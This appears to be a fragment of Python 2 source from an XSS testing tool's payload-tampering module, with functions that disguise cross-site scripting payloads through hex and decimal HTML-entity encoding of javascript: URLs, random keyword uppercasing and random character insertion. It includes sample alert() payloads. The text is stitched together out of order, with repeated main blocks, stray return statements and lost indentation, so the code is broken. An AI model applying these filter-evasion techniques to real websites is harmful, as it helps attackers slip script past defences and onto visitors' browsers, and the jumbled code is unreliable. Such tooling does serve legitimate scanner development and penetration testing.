payloads.add(self.keyword_sixteenhex(payload, ))
return payloads
def keyword_sixteenhex(self, str):
"""
将src, href中的标签16进制化
两种模式
j 变成 j
:param str:
:return:
"""
encode_str = ""
result_str = ""
try:
link_content = re.findall('(?:src|href)=(".*?")', str, re.S)[0]
if "javascript" in link_content:
for char in link_content.replace("\"", ""):
encode_str += "&#{}".format(
hex(ord(char)).replace("0x", "x"))
result_str = str.replace(link_content, encode_str)
except IndexError, e:
traceback.print_exc(file=open(EXCEPTION_LOG_PATH, 'a'))
return result_str
if __name__ == "__main__":
payload = '<img src="javascript:alert(65534);">'
payloads = set()
payloads.add(payload)
print Temper().temper(payload, )
payloads.add(payload)
if model == LIGHT_MODEL:
return payloads.pop()
return payloads
def add_rand_key(self, str, key):
"""
随机位置增加随机字符
"""
str = list(str)
random_index = int(random.random()*len(str))
random_index = random_index + 1 if random_index == 0 else random_index
str.insert(random_index, key)
return "".join(str)
def get_keyword_count(self):
count = 0
for keyword in self.keywords:
if keyword in self.payload:
count += 1
return count
if __name__ == "__main__":
payload = '<script>alert(65534);</script>'
payloads = set()
payloads.add(payload)
print Temper().temper(payload, number=5, )
temp_payload = payload
payloads.add(payload)
for keyword in self.keywords:
if keyword in payload:
payloads.add(
temp_payload.replace(keyword,
self.rand_upper(keyword, number)))
payload = payload.replace(keyword,
self.rand_upper(keyword, number))
payloads.add(payload)
if model == LIGHT_MODEL:
return payloads.pop()
return payloads
def rand_upper(self, str, number):
i = 0
str = list(str)
while i < number and i < len(str):
random_index = int(random.random() * len(str))
if str[random_index].islower():
str[random_index] = str[random_index].upper()
i += 1
return "".join(str)
if __name__ == "__main__":
payloads = set()
payload = '<script>alert(65534);</script>'
#payloads.add(payload)
for tenp in Temper().temper(payload, HEAVY_MODEL):
print tenp
def keyword_tenhex(self, str, model=1):
"""
将src, href中的标签10进制化
两种模式
j
j
:param str:
:return:
"""
encode_str = ""
result_str = ""
try:
link_content = re.findall('(?:src|href)=(".*?")', str, re.S)[0]
if "javascript" in link_content:
for char in link_content.replace("\"", ""):
if model == 1:
encode_str += "&#{};".format(ord(char))
elif model == 2:
encode_str += "�{}".format(ord(char))
result_str = str.replace(link_content, encode_str)
except IndexError:
pass
return result_str
if __name__ == "__main__":
payload = '<img src="javascript:alert(65534);">'
payloads = set()
payloads.add(payload)
print(Temper().temper(payload, ))